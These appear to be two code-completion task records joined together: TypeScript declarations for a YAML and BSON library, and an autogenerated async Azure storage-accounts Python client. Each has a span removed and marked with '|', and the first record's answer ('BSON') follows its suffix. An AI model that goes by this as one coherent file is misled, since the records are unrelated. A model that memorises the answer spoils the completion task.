* Applies iterator to each document if specified, or returns array of documents
*/
function safeLoad(input: string | Buffer, options?: I.Options): any;
}
/**
* YAML dumpers
*/
namespace dumper {
namespace I {
interface Options {
/**
* indentation width to use (in spaces). Default: 2
*/
indent?: number;
/**
* Do not throw on invalid types (like function in the safe schema) and skip pairs and single values with such types.
* Default: false
*/
skipInvalid?: boolean;
/**
* Specifies level of nesting, when to switch from block to flow style for collections.
* -1 means block style everwhere. Default: -1
*/
flowLevel?: number;
/**
* "tag" => "style" map. Each tag may have own set of styles
*/
styles?: object;
/**
* Specifies a schema to use
*/
schema?: schema.Schema;
/**
* If true, sort keys when dumping YAML. If a function, use the function to sort the keys. Default: false
*/
sortKeys?: boolean;
/**
* Set max line width. Default: 80
*/
lineWidth?: number;
/**
* If true, don't convert duplicate objects into references. Default: false
*/
noRefs?: boolean;
/**
* If true don't try to be compatible with older yaml versions.
* Currently: don't quote "yes", "no" and so on, as required for YAML 1.1.
* Default: false
*/
noCompatMode?: boolean;
/**
* If true flow sequences will be condensed, omitting the space between a, b. Eg. '[a,b]'
*/
condenseFlow?: boolean;
}
}
/**
* Same as safeDump() but without limits (uses DEFAULT_FULL by default)
*/
function dump(input: any, options?: I.Options): string;
/**
* Serializes object as a YAML document.
* Uses DEFAULT_SAFE, so it will throw an exception if you try to dump regexps or functions
*/
function safeDump(input: any, options?: I.Options): string;
}
/**
* YAML types for custom schemas
*/
namespace type {
namespace I {
type Kind = "scalar" | "sequence" | "mapping";
interface TypeOptions<T> {
kind: Kind;
resolve?(data: string): boolean;
construct?(data: string): T;
instanceOf?: object;
predicate?(obj: any): boolean;
represent?: ((obj: any, style: string) => string) | { [key: string]: (obj: any, style: string) => string };
defaultStyle?: string;
styleAliases?: object;
}
}
class Type<T = any> {
tag: string;
resolve(data: string): boolean;
construct(data: string): T;
instanceOf?: object;
predicate?(obj: any): boolean;
represent?: (obj: any, style: string) => string | { [key: string]: (obj: any, style: string) => string };
defaultStyle?: string;
styleAliases?: object;
constructor(tag: string, options: I.TypeOptions<T>);
}
namespace I {
interface Scalar<T = any> extends Type<T> {
kind: "scalar";
}
interface Mapping extends Type<object> {
kind: "mapping";
}
interface Sequence<T = any> extends Type<T[]> {
kind: "sequence";
}
}
const Binary: I.Scalar<Buffer>;
const Bool: I.Scalar<boolean>;
const Float: I.Scalar<number>;
const Int: I.Scalar<number>;
const Map: I.Mapping;
const Merge: I.Scalar;
const Null: I.Scalar<null>;
const Omap: I.Sequence<object>;
const Pairs: I.Sequence<[string, any]>;
const Seq: I.Sequence;
const Set: I.Mapping;
const Str: I.Scalar<string>;
const Timestamp: I.Scalar<Date>;
namespace js {
const Function: I.Scalar<(...args: any[]) => void>;
const RegExp: I.Scalar<RegExp>;
const Undefined: I.Scalar<undefined>;
}
}
/**
* YAML schemas
*/
namespace schema {
class Schema {
include: Schema[];
implicit: type.Type[];
explicit: type.Type[];
compiledImplicit: type.Type[];
compiledExplicit: type.Type[];
compiledTypeMap: {
scalar: { [key: string]: type.Type },
sequence: { [key: string]: type.Type },
mapping: { [key: string]: type.Type },
fallback: { [key: string]: type.Type }
};
constructor(_?: { include?: Schema[], implicit?: type.Type[], explicit?: type.Type[] });
}
function create(schemas: Schema | Schema[], types: type.Type | type.Type[]): Schema;
/**
* same as JSON
*/
const CORE: Schema;
/**
* all supported YAML types
*/
const DEFAULT_FULL: Schema;
/**
* all supported YAML types, without unsafe ones: !!js/undefined, !!js/regexp and !!js/function
*/
const DEFAULT_SAFE: Schema;
/**
* only strings, arrays and plain objects
*/
const FAILSAFE: Schema;
/**
* all JSON-supported types
*/
const JSON: Schema;
}
/**
* Represetns a mark that is used in exceptions to define the error's location
*/
class Mark {
name: string;
buffer: string;
position: number;
line: number;
column: number;
constructor(name: string, buffer: string, position: number, line: number, column: number);
getSnippet(indent?: number, maxLength?: number): string;
toString(compact?: boolean): string;
}
/**
* Represents a YAML exception
*/
class Exception extends adone.x.Exception {
reason: string;
mark: Mark;
constructor(reason: string, mark: Mark);
}
/**
* Encodes the given object using DEFAULT_SAFE scheme by default
*/
function encode(obj: any, options?: dumper.I.Options): Buffer;
/**
* Decodes the given string/buffer using DEFAULT_SAFE scheme by default
*/
function decode(buf: string | Buffer, options?: loader.I.Options): any;
/**
* The same as safeLoad() but uses DEFAULT_FULL_SCHEMA by default - adds some JavaScript-specific types: !!js/function, !!js/regexp and !!js/undefined.
* For untrusted sources, you must additionally validate object structure to avoid injections
*/
const load: typeof loader.load;
/**
* Same as safeLoadAll() but uses DEFAULT_FULL by default
*/
const loadAll: typeof loader.loadAll;
/**
* Parses string as single YAML document. Returns a JavaScript object or throws YAMLException on error.
* By default, does not support regexps, functions and undefined.
* This method is safe for untrusted data
*/
const safeLoad: typeof loader.safeLoad;
/**
* Same as safeLoad(), but understands multi-document sources.
* Applies iterator to each document if specified, or returns array of documents
*/
const safeLoadAll: typeof loader.safeLoadAll;
/**
* Same as safeDump() but without limits (uses DEFAULT_FULL by default)
*/
const dump: typeof dumper.dump;
/**
* Serializes object as a YAML document.
* Uses DEFAULT_SAFE, so it will throw an exception if you try to dump regexps or functions
*/
const safeDump: typeof dumper.safeDump;
}
/**
* BSON encoder
*/
namespace bson {
namespace I {
interface Type {
_bsontype: string;
}
}
/**
* Represents a BSON Binary type
*/
class Binary implements I.Type {
_bsontype: "binary";
constructor(buffer: number | Buffer, subType?: number);
/**
* Updates this binary with `byte`
*/
put(byte: number): void;
/**
* Writes a buffer or string to the binary
*/
write(string: string | Buffer, offset?: number): void;
/**
* Reads length bytes starting at position
*/
read(position: number, length?: number): void;
/**
* Returns the value of this binary as a string or buffer
*/
value(asRaw: true): Buffer;
value(): string;
/**
* Returns the length of the binary
*/
length(): number;
toJSON(): string;
toString(): string;
static BUFFER_SIZE: number;
static SUBTYPE_DEFAULT: number;
static SUBTYPE_FUNCTION: number;
static SUBTYPE_BYTE_ARRAY: number;
static SUBTYPE_UUID_OLD: number;
static SUBTYPE_UUID: number;
static SUBTYPE_MD5: number;
static SUBTYPE_USER_DEFINED: number;
}
/**
* Represents BSON Code type
*/
class Code implements I.Type {
_bsontype: "Code";
/**
* @param code a string or function
* @param scope an optional scope for the function
*/
constructor(code: string | ((...args: any[]) => void), scope?: object);
toJSON(): { scope: object, code: string };
}
/**
* Represents BSON DBRef type
*/
class DBRef implements I.Type {
_bsontype: "DBRef";
/**
* @param namespace the collection name
* @param oid the reference ObjectID
* @param db optional db name, if omitted the reference is local to the current db
*/
constructor(namespace: string, oid: ObjectId, db?: string);
toJSON(): { $ref: string, $id: ObjectId, $db: string };
}
/**
* Represents BSON Decimal128 type
*/
class Decimal128 implements I.Type {
_bsontype: "Decimal128";
/**
* @param bytes a buffer containing the raw Decimal128 bytes
*/
constructor(bytes: Buffer);
toString(): string;
toJSON(): { $numberDecimal: string };
/**
* Create a Decimal128 instance from a string representation
*
* @param string a numeric string representation
*/
static fromString(string: string): Decimal128;
}
/**
* Represents BSON Double type
*/
class Double implements I.Type {
_bsontype: "Double";
constructor(value: number);
valueOf(): number;
toJSON(): number;
}
/**
* /**
* Represents BSON Int32 type
*/
class Int32 implements I.Type {
_bsontype: "Int32";
constructor(value: number);
valueOf(): number;
toJSON(): number;
}
/**
* Represents BSON Long type
*/
class Long extends math.Long implements I.Type {
_bsontype: "Long";
static MIN_VALUE: Long;
static MAX_VALUE: Long;
static MAX_UNSIGNED_VALUE: Long;
static ZERO: Long;
static UZERO: Long;
static ONCE: Long;
static ONE: Long;
static UONE: Long;
static NEG_ONE: Long;
}
/**
* Represents BSON MaxKey type
*/
class MaxKey implements I.Type {
_bsontype: "MaxKey";
}
/**
* Represents BSON MinKey type
*/
class MinKey implements I.Type {
_bsontype: "MinKey";
}
/**
* Represents BSON ObjectId type
*/
class ObjectId implements I.Type {
_bsontype: "ObjectId";
generationTime: number;
constructor(id?: string | Buffer | ObjectId | { toHexString(): string, id: string | Buffer | ObjectId });
/**
* Return the ObjectId id as a 24 byte hex string representation
*/
toHexString(): string;
/**
* Returns the next ObjectId index
*/
getInc(): number;
/**
* Generate a 12 byte id buffer used in ObjectId's
*/
generate(time?: number): Buffer;
toString(format?: string): string;
toJSON(): string;
/**
* Compares the equality of this ObjectID with otherID
*/
equals(other: string | Buffer | ObjectId | { toHexString(): string }): boolean;
/**
* Returns the generation date (accurate up to the second) that this ID was generated
*/
getTimestamp(): Date;
/**
* Creates an ObjectId
*/
static createPk(): ObjectId;
/**
* Creates an ObjectId from a second based number, with the rest of the ObjectId zeroed out. Used for comparisons or sorting the ObjectId
*/
static createFromTime(time: number): ObjectId;
/**
* Creates an ObjectID from a hex string representation of an ObjectId
*/
static createFromHexString(string: string): ObjectId;
/**
* Checks if a value is a valid bson ObjectId
*/
static isValid(id: any): boolean;
static index: number;
}
/**
* Represents BSON RegExp type
*/
class BSONRegExp implements I.Type {
_bsontype: "BSONRegExp";
constructor(pattern: string, options?: string);
}
/**
* Represents BSON Symbol type
*/
class Symbol implements I.Type {
_bsontype: "Symbol";
constructor(value: string);
valueOf(): string;
toString(): string;
inspect(): string;
toJSON(): string;
}
/**
* This type is for INTERNAL use in MongoDB only and should not be used in applications
*/
class Timestamp extends math.Long implements I.Type {
_bsontype: "Timestamp";
static MIN_VALUE: Timestamp;
static MAX_VALUE: Timestamp;
static MAX_UNSIGNED_VALUE: Timestamp;
static ZERO: Timestamp;
static UZERO: Timestamp;
static ONCE: Timestamp;
static ONE: Timestamp;
static UONE: Timestamp;
static NEG_ONE: Timestamp;
}
namespace I {
interface SerializeOptions {
/**
* Whether to check if keys are valid. Default: false
*/
checkKeys?: boolean;
/**
* Whether to serialize javascript functions. Default: false
*/
serializeFunctions?: boolean;
/**
* Whether to ignore undefined values. Default: true
*/
ignoreUndefined?: boolean;
}
interface DeserializeOptions {
/**
* Evaluate functions in the BSON document scoped to the object deserialized.
* Default: false
*/
evalFunctions?: boolean;
/**
* Cache evaluated functions for reuse.
* Default: false
*/
cacheFunctions?: boolean;
/**
* Use a crc32 code for caching, otherwise use the string of the function.
* Default: false
*/
cacheFunctonsCrc32?: boolean;
/**
* When deserializing a Long will fit it into a Number if it's smaller than 53 bits.
* Default: true
*/
promoteLongs?: boolean;
/**
* When deserializing a Binary will return it as a node.js Buffer instance.
* Default: false
*/
promoteBuffers?: boolean;
/**
* When deserializing will promote BSON values to their Node.js closest equivalent types.
* Default: false
*/
promoteValues?: boolean;
/**
* Allow to specify if there what fields we wish to return as unserialized raw buffer.
*/
fieldsAsRaw?: string[];
/**
* Return BSON regular expressions as BSONRegExp instances.
* Default: false
*/
bsonRegExp?: boolean;
}
}
/**
* Represents a BSON serializer
*/
class
|
{
constructor(types?: Array<{ new (...args: any[]): I.Type }>);
/**
* Serializes a js object into a buffer
*/
serialize(object: object, options?: I.SerializeOptions): Buffer;
/**
* Takes an object, a target buffer instance and an optional options object and returns the end serialization index
* in the final buffer
*/
serializeWithBufferAndIndex(object: object, buffer: Buffer, options?: I.SerializeOptions & {
/**
* The index in the buffer where we wish to start serializing into
*/
index?: number
}): number;
/**
* Calculates the size BSON object for the given object
*/
calculateObjectSize(object: object, options?: {
/**
* Whether to serialize javascript functions. Default: false
*/
serializeFunctions?: boolean,
/**
* Whether to ignore undefined values. Default: true
*/
ignoreUndefined?: boolean
}): number;
/**
* Deserializes the given buffer into an object
*/
deserialize(buf: Buffer, options?: I.DeserializeOptions): any;
/**
* Takes a node.js Buffer, startIndex and allow more control over deserialization of a Buffer containing concatenated BSON documents
*/
deserializeStream(buf: Buffer, startIndex: number, numberOfDocuments: number, documents: any[], docStartIndex: number, options?: I.DeserializeOptions): number;
}
namespace c {
const BSON_INT32_MIN: number;
const BSON_INT32_MAX: number;
const BSON_INT64_MAX: number;
const BSON_INT64_MIN: number;
const JS_INT_MAX: number;
const JS_INT_MIN: number;
}
/**
* BSON serializator instance
*/
const serializer: BSON;
/**
* Encodes the given object
*/
function encode(obj: object, options?: I.SerializeOptions): Buffer;
/**
* Decodes the given buffer with enabled buffers and values promoting
*/
function decode(buf: Buffer, options?: I.DeserializeOptions): any;
}
}
}
|
BSON
|
_storage_accounts_operations.py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class StorageAccountsOperations:
"""StorageAccountsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.storage.v2017_10_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def check_name_availability(
self,
account_name: "_models.StorageAccountCheckNameAvailabilityParameters",
**kwargs: Any
) -> "_models.CheckNameAvailabilityResult":
"""Checks that the storage account name is valid and is not already in use.
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: ~azure.mgmt.storage.v2017_10_01.models.StorageAccountCheckNameAvailabilityParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CheckNameAvailabilityResult, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.CheckNameAvailabilityResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CheckNameAvailabilityResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self.check_name_availability.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(account_name, 'StorageAccountCheckNameAvailabilityParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('CheckNameAvailabilityResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_name_availability.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Storage/checkNameAvailability'} # type: ignore
async def _create_initial(
self,
resource_group_name: str,
account_name: str,
parameters: "_models.StorageAccountCreateParameters",
**kwargs: Any
) -> Optional["_models.StorageAccount"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.StorageAccount"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self._create_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'StorageAccountCreateParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('StorageAccount', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'} # type: ignore
async def begin_create(
self,
resource_group_name: str,
account_name: str,
parameters: "_models.StorageAccountCreateParameters",
**kwargs: Any
) -> AsyncLROPoller["_models.StorageAccount"]:
"""Asynchronously creates a new storage account with the specified parameters. If an account is
already created and a subsequent create request is issued with different properties, the
account properties will be updated. If an account is already created and a subsequent create or
update request is issued with the exact same set of properties, the request will succeed.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param parameters: The parameters to provide for the created account.
:type parameters: ~azure.mgmt.storage.v2017_10_01.models.StorageAccountCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either StorageAccount or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.storage.v2017_10_01.models.StorageAccount]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccount"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_initial(
resource_group_name=resource_group_name,
account_name=account_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('StorageAccount', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
account_name: str,
**kwargs: Any
) -> None:
"""Deletes a storage account in Microsoft Azure.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'} # type: ignore
async def get_properties(
self,
resource_group_name: str,
account_name: str,
**kwargs: Any
) -> "_models.StorageAccount":
"""Returns the properties for the specified storage account including but not limited to name, SKU
name, location, and account status. The ListKeys operation should be used to retrieve storage
keys.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageAccount, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.StorageAccount
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccount"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
accept = "application/json, text/json"
# Construct URL
url = self.get_properties.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('StorageAccount', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_properties.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'} # type: ignore
async def update(
self,
resource_group_name: str,
account_name: str,
parameters: "_models.StorageAccountUpdateParameters",
**kwargs: Any
) -> "_models.StorageAccount":
"""The update operation can be used to update the SKU, encryption, access tier, or tags for a
storage account. It can also be used to map the account to a custom domain. Only one custom
domain is supported per storage account; the replacement/change of custom domain is not
supported. In order to replace an old custom domain, the old value must be cleared/unregistered
before a new value can be set. The update of multiple properties is supported. This call does
not change the storage keys for the account. If you want to change the storage account keys,
use the regenerate keys operation. The location and name of the storage account cannot be
changed after creation.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param parameters: The parameters to provide for the updated account.
:type parameters: ~azure.mgmt.storage.v2017_10_01.models.StorageAccountUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageAccount, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.StorageAccount
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccount"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'StorageAccountUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('StorageAccount', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'} # type: ignore
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.StorageAccountListResult"]:
"""Lists all the storage accounts available under the subscription. Note that storage keys are not
returned; use the ListKeys operation for this.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StorageAccountListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.storage.v2017_10_01.models.StorageAccountListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccountListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StorageAccountListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
|
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Storage/storageAccounts'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.StorageAccountListResult"]:
"""Lists all the storage accounts available under the given resource group. Note that storage keys
are not returned; use the ListKeys operation for this.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StorageAccountListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.storage.v2017_10_01.models.StorageAccountListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccountListResult"]
error_map = {
